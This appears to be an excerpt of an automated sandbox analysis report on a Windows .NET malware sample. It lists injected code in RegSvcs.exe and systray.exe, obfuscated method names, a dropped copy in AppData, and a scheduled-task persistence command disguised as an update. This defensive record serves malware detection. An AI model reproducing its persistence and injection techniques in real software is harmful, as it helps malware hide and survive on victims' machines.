                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0166225F pushad ; ret | 10_2_016627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016627FA pushad ; ret | 10_2_016627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016909AD push ecx; mov dword ptr [esp], ecx | 10_2_016909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0166283D push eax; iretd | 10_2_01662858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01661328 push eax; iretd | 10_2_01661369
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Code function: 11_2_07FA6430 pushfd ; retf | 11_2_07FA6431
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Code function: 11_2_07FA63F2 pushad ; retf | 11_2_07FA63F9
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Code function: 11_2_07FACAC0 push 400301A8h; iretd | 11_2_07FACAC5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_019BC54F push 8B019467h; ret | 17_2_019BC554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_019BC54D pushfd ; ret | 17_2_019BC54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_019709AD push ecx; mov dword ptr [esp], ecx | 17_2_019709B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_019BC9D7 push edi; ret | 17_2_019BC9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_01941368 push eax; iretd | 17_2_01941369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_01941FEC push eax; iretd | 17_2_01941FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_019C7E99 push ecx; ret | 17_2_019C7EAC
                Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04AD09AD push ecx; mov dword ptr [esp], ecx | 19_2_04AD09B6
                Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00AB402B push 6FB25C47h; retf | 19_2_00AB4035
                Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00AC4136 push dword ptr [esi+eax*2+5Fh]; retf | 19_2_00AC4145
                Source: MN1qo2qaJmEvXDP.exe | Static PE information: section name: .text entropy: 7.73824516544036
                Source: rlJvZXSinaRi.exe.0.dr | Static PE information: section name: .text entropy: 7.73824516544036
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, uSCOeOswi3t3pCK74b0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PwJeOODmhv', 'JWZekioUfb', 'PIceY14kDV', 'oQVect2SqJ', 'DOBePAt7gs', 'N3telub0je', 'yVBeEJf1pl'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, GEBJEhGjieg361Vr8V.cs | High entropy of concatenated method names: 'yQwucEQtTq', 'KIeuPFAYJQ', 'lgWulIqGL4', 'vbauE7RcaL', 'PePumUHWfR', 'LR6uBHaygB', 'FotuLogk2f', 'N1ZuoLgagq', 'BvVuCTq2Lc', 'oYbuAIKSNj'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, o9ymQMYacMp0ssZHyR.cs | High entropy of concatenated method names: 'UvWQGWF8sU', 'djAQj2TMbB', 'hO3Q8IwsUO', 'oABQSFfn2J', 'pZ9QHkTGmp', 'S5dQFvFBFA', 'egTQtuNHLK', 'c8sQZQUZSe', 'KvxQaboOyG', 'm2xQO1DIDB'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, cnly1l8b5RYA8Cg4hc.cs | High entropy of concatenated method names: 'zd59UbtUU8', 'HHa9u1a6Jj', 'WJn90cOvLY', 'xC19Deq2Rm', 'Tyy9WwYbrj', 'HKc0m4Q7xv', 'ApT0BatwLb', 'LJF0LfgrNP', 'Nmj0oNceFx', 'gBs0CDATRK'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, W2GbS7ctm56xnVCTTs.cs | High entropy of concatenated method names: 'GAInaIearf', 'GvCnkn37Qo', 'QEjncepLih', 'VRJnP98MoY', 'TdMnStVarj', 'VbLnh0q952', 'gAInHt86pm', 'BntnFCoXsT', 'y9vnMWHyiS', 'bd5nth7yr7'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, WZ8woTCqqfGmwsK6uH.cs | High entropy of concatenated method names: 'P47X8U4RDp', 'CKaXS7Kr8v', 'aiPXhGaDCh', 'uOQXHIr6k5', 'yrPXFn2YQn', 'DouXMe5I5Y', 'KufXtfpK56', 'EeoXZFHL7t', 'zMmX3hfPqk', 'v97Xa4AjQi'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, tHnWHHNaWw3UFRXi5I.cs | High entropy of concatenated method names: 'LoSsDEBJEh', 'EiesWg361V', 'LGysRP8OKi', 'hupsvoYtNe', 'GIssns9gnl', 'q1lsxb5RYA', 'ju7cq9B0fKAPyxioQe', 'yJy7iJjKjdkNWrFh3j', 'FKFssl11lF', 'gXrsKb3XsY'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, v9UB23bcfulLsphOi7.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oEKgC4edmU', 'MLrgAKGZAR', 'qNYgzlDA8Q', 'gZPKwJ2wJN', 'LmGKskTE69', 'F4LKgnMG95', 'qAeKK118Ha', 'UY4fhT5NEUWAOcnf9g0'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, GDVAAOBvhEAucrmXbL.cs | High entropy of concatenated method names: 'ecW1oLHqki', 'TUB1AQiWXT', 'u1vywS5lC8', 'ql1ysgubwl', 'kmx1OYKQrV', 'VYD1ktIlBk', 'JnP1YnK4qF', 'Xpx1cY18qK', 'oNR1Paem4F', 'Bbn1lvgnJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.cs | High entropy of concatenated method names: 's8eKUf0xQM', 'AY6KfgrT4Y', 'J21Ku5rfAh', 'hQsKbTLHy6', 'lFIK0B9amg', 'qUKK9yXHow', 'k94KDDotJm', 'bXcKWskDxE', 'dZkKIvBcGF', 'bewKRxyoZv'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, z95CQt3ZHDEQED6kMV.cs | High entropy of concatenated method names: 'IRED2PrN54', 'NFqDr7fJ3K', 'kdMD5kCOxr', 'gpMDTkNosC', 'SZ4Dd9MICs', 'T3QD6FwFZj', 'P6PDi25GYV', 'z45DGoOgf2', 'LlDDjrMjKr', 'OJsDJ5tmWm'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, cS5igaL7Ukukna13hg.cs | High entropy of concatenated method names: 'MKUXnZdIQ0', 'HdMX1H8AYh', 'JIcXXdGFLh', 'eJVXptXXPD', 'Vn1X4Y6EZA', 'nAlX7SmjHr', 'Dispose', 'rm9yfL74V3', 'a8ZyuHjIdV', 'X2OybSyxD2'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, oioII1u2iohGVScvCK.cs | High entropy of concatenated method names: 'Dispose', 'PuksCna13h', 'H7egS9T0ic', 'oHCc9frGjM', 'cmWsAembM5', 'i08szgZ6PW', 'ProcessDialogKey', 'mdogwZ8woT', 'wqfgsGmwsK', 'CuHggAIDK8'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, pNHtmZjGyP8OKibupo.cs | High entropy of concatenated method names: 'FwlbTwLV9t', 'xYLb6Tj2db', 'XmobGjbNYL', 'Ek8bjNqewb', 'ODLbnbuM6H', 'uZrbxEdlIp', 'rfvb1Uy1w1', 'XmMbyeeGHZ', 'Nv3bXVVbvE', 'vI8bebD9eO'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, QtNeh2JvwRXJNSIss9.cs | High entropy of concatenated method names: 'G2O0dYdON9', 'jMN0ipQNkb', 'zSIbhCT88B', 'L0BbHbpoPO', 'sltbFBFbd8', 'pMybMu54pS', 'EqIbtCT76E', 'i3LbZTwfi0', 'thWb39l0hA', 'bSkbaHaYUb'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, IvSoATzCiQOIdwUjvL.cs | High entropy of concatenated method names: 'pEXe6nL7TL', 'zEreGDwlTV', 'Sx5ejoghsB', 'hPae8QFrr5', 'ntMeSriIID', 'owKeHB5pyu', 'YnPeFof8sC', 'CRJe7aLqHb', 'pX4e2dDFFU', 'XbOerOHf2b'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, EkCE1YgLaLwc7KBIkN.cs | High entropy of concatenated method names: 'HOj57TWyV', 'aBLTVY1gK', 'OTd6mbc9D', 'xdAiYtug9', 'BrKjQMUYi', 'dPyJPgjlf', 'tAlhQfMRoq0DNutkFA', 'ldK4avLUBusYBWotFt', 'm5jyVOYL7', 'rWKer1BWL'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, nCI8PvtrJldSaZ0bMU.cs | High entropy of concatenated method names: 'LA8Dfri7H5', 'V7FDbTof2X', 'NhhD9p0DnH', 'r2F9AsRjNl', 'Mcc9zTBqdp', 'GlbDwGZpfX', 'DSjDsw5mFl', 'POdDgRT1F9', 'LySDKTnRg8', 'gEsDN8CycI'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, dALCuLlFL8uRisXkOc.cs | High entropy of concatenated method names: 'ToString', 'Il5xOnajhI', 'bJExSFgj9P', 'yeMxhFnnyC', 'UinxHXrrHp', 'Y2nxFQRLVx', 'e25xM1BTA8', 'ljFxtSDyAV', 'R9ixZjsWHc', 'qXvx3lrsJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, YIDK8RAQK6sX8UPwYc.cs | High entropy of concatenated method names: 'HYXebgyMAo', 'o5Ve0bJvar', 'dKSe9B4Dpq', 'DjteDj92K3', 'bFceXSWuaj', 'lbBeWPCa8i', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, vTnFiassMKl25nAas6w.cs | High entropy of concatenated method names: 'XhkeAQqVGe', 'Q6deza8v8B', 'CtFpwDw5bi', 'vxFpsOpwam', 'RhTpgq6l94', 'AKkpK1noD4', 'ruXpNmxuns', 'WHbpUJKOY6', 'dnlpfoddJ5', 'qdvpu8hvCh'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, fovaF3EuYxn1vCZo2Q.cs | High entropy of concatenated method names: 'HrA1RJ0oib', 'NVy1vP4EOa', 'ToString', 'Rhx1fgRuf6', 'csO1uxUdo3', 'hjh1bACsK3', 'tTM10xnsVN', 'vN119UL8hY', 'qCR1DV8OAF', 'TgS1WEwOPt'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, uSCOeOswi3t3pCK74b0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PwJeOODmhv', 'JWZekioUfb', 'PIceY14kDV', 'oQVect2SqJ', 'DOBePAt7gs', 'N3telub0je', 'yVBeEJf1pl'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, GEBJEhGjieg361Vr8V.cs | High entropy of concatenated method names: 'yQwucEQtTq', 'KIeuPFAYJQ', 'lgWulIqGL4', 'vbauE7RcaL', 'PePumUHWfR', 'LR6uBHaygB', 'FotuLogk2f', 'N1ZuoLgagq', 'BvVuCTq2Lc', 'oYbuAIKSNj'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, o9ymQMYacMp0ssZHyR.cs | High entropy of concatenated method names: 'UvWQGWF8sU', 'djAQj2TMbB', 'hO3Q8IwsUO', 'oABQSFfn2J', 'pZ9QHkTGmp', 'S5dQFvFBFA', 'egTQtuNHLK', 'c8sQZQUZSe', 'KvxQaboOyG', 'm2xQO1DIDB'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, cnly1l8b5RYA8Cg4hc.cs | High entropy of concatenated method names: 'zd59UbtUU8', 'HHa9u1a6Jj', 'WJn90cOvLY', 'xC19Deq2Rm', 'Tyy9WwYbrj', 'HKc0m4Q7xv', 'ApT0BatwLb', 'LJF0LfgrNP', 'Nmj0oNceFx', 'gBs0CDATRK'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, W2GbS7ctm56xnVCTTs.cs | High entropy of concatenated method names: 'GAInaIearf', 'GvCnkn37Qo', 'QEjncepLih', 'VRJnP98MoY', 'TdMnStVarj', 'VbLnh0q952', 'gAInHt86pm', 'BntnFCoXsT', 'y9vnMWHyiS', 'bd5nth7yr7'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, WZ8woTCqqfGmwsK6uH.cs | High entropy of concatenated method names: 'P47X8U4RDp', 'CKaXS7Kr8v', 'aiPXhGaDCh', 'uOQXHIr6k5', 'yrPXFn2YQn', 'DouXMe5I5Y', 'KufXtfpK56', 'EeoXZFHL7t', 'zMmX3hfPqk', 'v97Xa4AjQi'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, tHnWHHNaWw3UFRXi5I.cs | High entropy of concatenated method names: 'LoSsDEBJEh', 'EiesWg361V', 'LGysRP8OKi', 'hupsvoYtNe', 'GIssns9gnl', 'q1lsxb5RYA', 'ju7cq9B0fKAPyxioQe', 'yJy7iJjKjdkNWrFh3j', 'FKFssl11lF', 'gXrsKb3XsY'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, v9UB23bcfulLsphOi7.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oEKgC4edmU', 'MLrgAKGZAR', 'qNYgzlDA8Q', 'gZPKwJ2wJN', 'LmGKskTE69', 'F4LKgnMG95', 'qAeKK118Ha', 'UY4fhT5NEUWAOcnf9g0'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, GDVAAOBvhEAucrmXbL.cs | High entropy of concatenated method names: 'ecW1oLHqki', 'TUB1AQiWXT', 'u1vywS5lC8', 'ql1ysgubwl', 'kmx1OYKQrV', 'VYD1ktIlBk', 'JnP1YnK4qF', 'Xpx1cY18qK', 'oNR1Paem4F', 'Bbn1lvgnJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.cs | High entropy of concatenated method names: 's8eKUf0xQM', 'AY6KfgrT4Y', 'J21Ku5rfAh', 'hQsKbTLHy6', 'lFIK0B9amg', 'qUKK9yXHow', 'k94KDDotJm', 'bXcKWskDxE', 'dZkKIvBcGF', 'bewKRxyoZv'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, z95CQt3ZHDEQED6kMV.cs | High entropy of concatenated method names: 'IRED2PrN54', 'NFqDr7fJ3K', 'kdMD5kCOxr', 'gpMDTkNosC', 'SZ4Dd9MICs', 'T3QD6FwFZj', 'P6PDi25GYV', 'z45DGoOgf2', 'LlDDjrMjKr', 'OJsDJ5tmWm'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, cS5igaL7Ukukna13hg.cs | High entropy of concatenated method names: 'MKUXnZdIQ0', 'HdMX1H8AYh', 'JIcXXdGFLh', 'eJVXptXXPD', 'Vn1X4Y6EZA', 'nAlX7SmjHr', 'Dispose', 'rm9yfL74V3', 'a8ZyuHjIdV', 'X2OybSyxD2'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, oioII1u2iohGVScvCK.cs | High entropy of concatenated method names: 'Dispose', 'PuksCna13h', 'H7egS9T0ic', 'oHCc9frGjM', 'cmWsAembM5', 'i08szgZ6PW', 'ProcessDialogKey', 'mdogwZ8woT', 'wqfgsGmwsK', 'CuHggAIDK8'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, pNHtmZjGyP8OKibupo.cs | High entropy of concatenated method names: 'FwlbTwLV9t', 'xYLb6Tj2db', 'XmobGjbNYL', 'Ek8bjNqewb', 'ODLbnbuM6H', 'uZrbxEdlIp', 'rfvb1Uy1w1', 'XmMbyeeGHZ', 'Nv3bXVVbvE', 'vI8bebD9eO'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, QtNeh2JvwRXJNSIss9.cs | High entropy of concatenated method names: 'G2O0dYdON9', 'jMN0ipQNkb', 'zSIbhCT88B', 'L0BbHbpoPO', 'sltbFBFbd8', 'pMybMu54pS', 'EqIbtCT76E', 'i3LbZTwfi0', 'thWb39l0hA', 'bSkbaHaYUb'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, IvSoATzCiQOIdwUjvL.cs | High entropy of concatenated method names: 'pEXe6nL7TL', 'zEreGDwlTV', 'Sx5ejoghsB', 'hPae8QFrr5', 'ntMeSriIID', 'owKeHB5pyu', 'YnPeFof8sC', 'CRJe7aLqHb', 'pX4e2dDFFU', 'XbOerOHf2b'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, EkCE1YgLaLwc7KBIkN.cs | High entropy of concatenated method names: 'HOj57TWyV', 'aBLTVY1gK', 'OTd6mbc9D', 'xdAiYtug9', 'BrKjQMUYi', 'dPyJPgjlf', 'tAlhQfMRoq0DNutkFA', 'ldK4avLUBusYBWotFt', 'm5jyVOYL7', 'rWKer1BWL'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, nCI8PvtrJldSaZ0bMU.cs | High entropy of concatenated method names: 'LA8Dfri7H5', 'V7FDbTof2X', 'NhhD9p0DnH', 'r2F9AsRjNl', 'Mcc9zTBqdp', 'GlbDwGZpfX', 'DSjDsw5mFl', 'POdDgRT1F9', 'LySDKTnRg8', 'gEsDN8CycI'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, dALCuLlFL8uRisXkOc.cs | High entropy of concatenated method names: 'ToString', 'Il5xOnajhI', 'bJExSFgj9P', 'yeMxhFnnyC', 'UinxHXrrHp', 'Y2nxFQRLVx', 'e25xM1BTA8', 'ljFxtSDyAV', 'R9ixZjsWHc', 'qXvx3lrsJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, YIDK8RAQK6sX8UPwYc.cs | High entropy of concatenated method names: 'HYXebgyMAo', 'o5Ve0bJvar', 'dKSe9B4Dpq', 'DjteDj92K3', 'bFceXSWuaj', 'lbBeWPCa8i', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, vTnFiassMKl25nAas6w.cs | High entropy of concatenated method names: 'XhkeAQqVGe', 'Q6deza8v8B', 'CtFpwDw5bi', 'vxFpsOpwam', 'RhTpgq6l94', 'AKkpK1noD4', 'ruXpNmxuns', 'WHbpUJKOY6', 'dnlpfoddJ5', 'qdvpu8hvCh'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, fovaF3EuYxn1vCZo2Q.cs | High entropy of concatenated method names: 'HrA1RJ0oib', 'NVy1vP4EOa', 'ToString', 'Rhx1fgRuf6', 'csO1uxUdo3', 'hjh1bACsK3', 'tTM10xnsVN', 'vN119UL8hY', 'qCR1DV8OAF', 'TgS1WEwOPt'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, uSCOeOswi3t3pCK74b0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PwJeOODmhv', 'JWZekioUfb', 'PIceY14kDV', 'oQVect2SqJ', 'DOBePAt7gs', 'N3telub0je', 'yVBeEJf1pl'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, GEBJEhGjieg361Vr8V.cs | High entropy of concatenated method names: 'yQwucEQtTq', 'KIeuPFAYJQ', 'lgWulIqGL4', 'vbauE7RcaL', 'PePumUHWfR', 'LR6uBHaygB', 'FotuLogk2f', 'N1ZuoLgagq', 'BvVuCTq2Lc', 'oYbuAIKSNj'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, o9ymQMYacMp0ssZHyR.cs | High entropy of concatenated method names: 'UvWQGWF8sU', 'djAQj2TMbB', 'hO3Q8IwsUO', 'oABQSFfn2J', 'pZ9QHkTGmp', 'S5dQFvFBFA', 'egTQtuNHLK', 'c8sQZQUZSe', 'KvxQaboOyG', 'm2xQO1DIDB'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, cnly1l8b5RYA8Cg4hc.cs | High entropy of concatenated method names: 'zd59UbtUU8', 'HHa9u1a6Jj', 'WJn90cOvLY', 'xC19Deq2Rm', 'Tyy9WwYbrj', 'HKc0m4Q7xv', 'ApT0BatwLb', 'LJF0LfgrNP', 'Nmj0oNceFx', 'gBs0CDATRK'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, W2GbS7ctm56xnVCTTs.cs | High entropy of concatenated method names: 'GAInaIearf', 'GvCnkn37Qo', 'QEjncepLih', 'VRJnP98MoY', 'TdMnStVarj', 'VbLnh0q952', 'gAInHt86pm', 'BntnFCoXsT', 'y9vnMWHyiS', 'bd5nth7yr7'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, WZ8woTCqqfGmwsK6uH.cs | High entropy of concatenated method names: 'P47X8U4RDp', 'CKaXS7Kr8v', 'aiPXhGaDCh', 'uOQXHIr6k5', 'yrPXFn2YQn', 'DouXMe5I5Y', 'KufXtfpK56', 'EeoXZFHL7t', 'zMmX3hfPqk', 'v97Xa4AjQi'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, tHnWHHNaWw3UFRXi5I.cs | High entropy of concatenated method names: 'LoSsDEBJEh', 'EiesWg361V', 'LGysRP8OKi', 'hupsvoYtNe', 'GIssns9gnl', 'q1lsxb5RYA', 'ju7cq9B0fKAPyxioQe', 'yJy7iJjKjdkNWrFh3j', 'FKFssl11lF', 'gXrsKb3XsY'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, v9UB23bcfulLsphOi7.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oEKgC4edmU', 'MLrgAKGZAR', 'qNYgzlDA8Q', 'gZPKwJ2wJN', 'LmGKskTE69', 'F4LKgnMG95', 'qAeKK118Ha', 'UY4fhT5NEUWAOcnf9g0'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, GDVAAOBvhEAucrmXbL.cs | High entropy of concatenated method names: 'ecW1oLHqki', 'TUB1AQiWXT', 'u1vywS5lC8', 'ql1ysgubwl', 'kmx1OYKQrV', 'VYD1ktIlBk', 'JnP1YnK4qF', 'Xpx1cY18qK', 'oNR1Paem4F', 'Bbn1lvgnJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.cs | High entropy of concatenated method names: 's8eKUf0xQM', 'AY6KfgrT4Y', 'J21Ku5rfAh', 'hQsKbTLHy6', 'lFIK0B9amg', 'qUKK9yXHow', 'k94KDDotJm', 'bXcKWskDxE', 'dZkKIvBcGF', 'bewKRxyoZv'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, z95CQt3ZHDEQED6kMV.cs | High entropy of concatenated method names: 'IRED2PrN54', 'NFqDr7fJ3K', 'kdMD5kCOxr', 'gpMDTkNosC', 'SZ4Dd9MICs', 'T3QD6FwFZj', 'P6PDi25GYV', 'z45DGoOgf2', 'LlDDjrMjKr', 'OJsDJ5tmWm'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, cS5igaL7Ukukna13hg.cs | High entropy of concatenated method names: 'MKUXnZdIQ0', 'HdMX1H8AYh', 'JIcXXdGFLh', 'eJVXptXXPD', 'Vn1X4Y6EZA', 'nAlX7SmjHr', 'Dispose', 'rm9yfL74V3', 'a8ZyuHjIdV', 'X2OybSyxD2'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, oioII1u2iohGVScvCK.cs | High entropy of concatenated method names: 'Dispose', 'PuksCna13h', 'H7egS9T0ic', 'oHCc9frGjM', 'cmWsAembM5', 'i08szgZ6PW', 'ProcessDialogKey', 'mdogwZ8woT', 'wqfgsGmwsK', 'CuHggAIDK8'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, pNHtmZjGyP8OKibupo.cs | High entropy of concatenated method names: 'FwlbTwLV9t', 'xYLb6Tj2db', 'XmobGjbNYL', 'Ek8bjNqewb', 'ODLbnbuM6H', 'uZrbxEdlIp', 'rfvb1Uy1w1', 'XmMbyeeGHZ', 'Nv3bXVVbvE', 'vI8bebD9eO'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, QtNeh2JvwRXJNSIss9.cs | High entropy of concatenated method names: 'G2O0dYdON9', 'jMN0ipQNkb', 'zSIbhCT88B', 'L0BbHbpoPO', 'sltbFBFbd8', 'pMybMu54pS', 'EqIbtCT76E', 'i3LbZTwfi0', 'thWb39l0hA', 'bSkbaHaYUb'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, IvSoATzCiQOIdwUjvL.cs | High entropy of concatenated method names: 'pEXe6nL7TL', 'zEreGDwlTV', 'Sx5ejoghsB', 'hPae8QFrr5', 'ntMeSriIID', 'owKeHB5pyu', 'YnPeFof8sC', 'CRJe7aLqHb', 'pX4e2dDFFU', 'XbOerOHf2b'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, EkCE1YgLaLwc7KBIkN.cs | High entropy of concatenated method names: 'HOj57TWyV', 'aBLTVY1gK', 'OTd6mbc9D', 'xdAiYtug9', 'BrKjQMUYi', 'dPyJPgjlf', 'tAlhQfMRoq0DNutkFA', 'ldK4avLUBusYBWotFt', 'm5jyVOYL7', 'rWKer1BWL'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, nCI8PvtrJldSaZ0bMU.cs | High entropy of concatenated method names: 'LA8Dfri7H5', 'V7FDbTof2X', 'NhhD9p0DnH', 'r2F9AsRjNl', 'Mcc9zTBqdp', 'GlbDwGZpfX', 'DSjDsw5mFl', 'POdDgRT1F9', 'LySDKTnRg8', 'gEsDN8CycI'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, dALCuLlFL8uRisXkOc.cs | High entropy of concatenated method names: 'ToString', 'Il5xOnajhI', 'bJExSFgj9P', 'yeMxhFnnyC', 'UinxHXrrHp', 'Y2nxFQRLVx', 'e25xM1BTA8', 'ljFxtSDyAV', 'R9ixZjsWHc', 'qXvx3lrsJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, YIDK8RAQK6sX8UPwYc.cs | High entropy of concatenated method names: 'HYXebgyMAo', 'o5Ve0bJvar', 'dKSe9B4Dpq', 'DjteDj92K3', 'bFceXSWuaj', 'lbBeWPCa8i', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, vTnFiassMKl25nAas6w.cs | High entropy of concatenated method names: 'XhkeAQqVGe', 'Q6deza8v8B', 'CtFpwDw5bi', 'vxFpsOpwam', 'RhTpgq6l94', 'AKkpK1noD4', 'ruXpNmxuns', 'WHbpUJKOY6', 'dnlpfoddJ5', 'qdvpu8hvCh'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, fovaF3EuYxn1vCZo2Q.cs | High entropy of concatenated method names: 'HrA1RJ0oib', 'NVy1vP4EOa', 'ToString', 'Rhx1fgRuf6', 'csO1uxUdo3', 'hjh1bACsK3', 'tTM10xnsVN', 'vN119UL8hY', 'qCR1DV8OAF', 'TgS1WEwOPt'
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | File created: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe

                Boot Survival

                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
